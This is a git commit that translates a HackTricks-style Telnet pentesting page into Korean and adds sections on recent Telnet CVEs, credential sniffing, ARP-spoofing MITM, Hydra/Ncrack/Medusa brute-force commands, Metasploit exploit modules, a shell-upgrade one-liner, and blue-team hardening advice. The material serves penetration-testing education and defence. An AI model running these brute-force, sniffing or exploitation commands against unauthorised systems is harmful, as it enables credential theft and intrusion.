Translated ['src/network-services-pentesting/pentesting-telnet.md'] to k

This commit is contained in:
Translator 2025-07-13 21:25:13 +00:00
parent b06496db73
commit 3e04ddc7d8

View File

@ -27,9 +27,9 @@ nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
**이 옵션을 열거하는 것이 가능하다는 것을 알고 있지만, 방법을 모르니 아는 경우 알려주세요.**
### [Brute force](../generic-hacking/brute-force.md#telnet)
### [무차별 대입](../generic-hacking/brute-force.md#telnet)
## Config file
## 구성 파일
```bash
/etc/inetd.conf
/etc/xinetd.d/telnet
@ -67,4 +67,60 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
```
{{#include ../banners/hacktricks-training.md}}
### Recent Vulnerabilities (2022-2025)
* **CVE-2024-45698 D-Link Wi-Fi 6 routers (DIR-X4860)**: 내장된 Telnet 서비스는 하드코딩된 자격 증명을 수용하고 입력을 정리하지 않아, 포트 23에서 조작된 명령을 통해 루트로 인증되지 않은 원격 RCE를 허용합니다. 펌웨어 ≥ 1.04B05에서 수정됨.
* **CVE-2023-40478 NETGEAR RAX30**: Telnet CLI `passwd` 명령에서 스택 기반 버퍼 오버플로우가 발생하여 인접한 공격자가 인증을 우회하고 루트로 임의 코드를 실행할 수 있게 합니다.
* **CVE-2022-39028 GNU inetutils telnetd**: 두 바이트 시퀀스(`0xff 0xf7` / `0xff 0xf8`)가 NULL 포인터 역참조를 유발하여 `telnetd`를 충돌시킬 수 있으며, 여러 번의 충돌 후 지속적인 DoS를 초래합니다.
취약점 분류 중 이러한 CVE를 염두에 두십시오—대상이 패치되지 않은 펌웨어 또는 레거시 inetutils Telnet 데몬을 실행 중이라면 코드 실행 또는 방해가 되는 DoS로의 직선 경로가 있을 수 있습니다.
### Sniffing Credentials & Man-in-the-Middle
Telnet은 자격 증명을 포함한 모든 것을 **명확한 텍스트**로 전송합니다. 자격 증명을 캡처하는 두 가지 빠른 방법:
```bash
# Live capture with tcpdump (print ASCII)
sudo tcpdump -i eth0 -A 'tcp port 23 and not src host $(hostname -I | cut -d" " -f1)'
# Wireshark display filter
tcp.port == 23 && (telnet.data || telnet.option)
```
활성 MITM의 경우, ARP 스푸핑(예: `arpspoof`/`ettercap`)을 동일한 스니핑 필터와 결합하여 스위치 네트워크에서 비밀번호를 수집합니다.
### 자동화된 무차별 대입 / 비밀번호 스프레이링
```bash
# Hydra (stop at first valid login)
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>
# Ncrack (drop to interactive session on success)
ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>
# Medusa (parallel hosts)
medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f
```
대부분의 IoT 봇넷(Mirai 변종)은 여전히 기본 자격 증명 사전으로 포트 23을 스캔합니다. 이러한 논리를 반영하면 약한 장치를 빠르게 식별할 수 있습니다.
### Exploitation & Post-Exploitation
Metasploit에는 여러 유용한 모듈이 있습니다:
* `auxiliary/scanner/telnet/telnet_version` 배너 및 옵션 열거.
* `auxiliary/scanner/telnet/brute_telnet` 멀티스레드 브루트포스.
* `auxiliary/scanner/telnet/telnet_encrypt_overflow` 취약한 Solaris 9/10 Telnet에 대한 RCE (옵션 ENCRYPT 처리).
* `exploit/linux/mips/netgear_telnetenable` 많은 NETGEAR 라우터에서 조작된 패킷으로 telnet 서비스를 활성화합니다.
쉘을 얻은 후 **TTY는 일반적으로 멍청하다는 것을 기억하세요**; `python -c 'import pty;pty.spawn("/bin/bash")'`로 업그레이드하거나 [HackTricks TTY tricks](/generic-hacking/reverse-shells/full-ttys.md)를 사용하세요.
### Hardening & Detection (Blue team corner)
1. SSH를 선호하고 Telnet 서비스를 완전히 비활성화하세요.
2. Telnet이 필요한 경우 관리 VLAN에만 바인딩하고 ACL을 적용하며 데몬을 TCP 래퍼로 감싸세요 (`/etc/hosts.allow`).
3. 레거시 `telnetd` 구현을 `ssl-telnet` 또는 `telnetd-ssl`로 교체하여 전송 암호화를 추가하되, **이는 데이터 전송 중 보호만 제공하며 비밀번호 추측은 여전히 간단합니다**.
4. 포트 23으로의 아웃바운드 트래픽을 모니터링하세요; 타협은 종종 엄격한 HTTP 이탈 필터를 우회하기 위해 Telnet을 통해 리버스 쉘을 생성합니다.
## References
* D-Link Advisory CVE-2024-45698 Critical Telnet RCE.
* NVD CVE-2022-39028 inetutils `telnetd` DoS.
{{#include /banners/hacktricks-training.md}}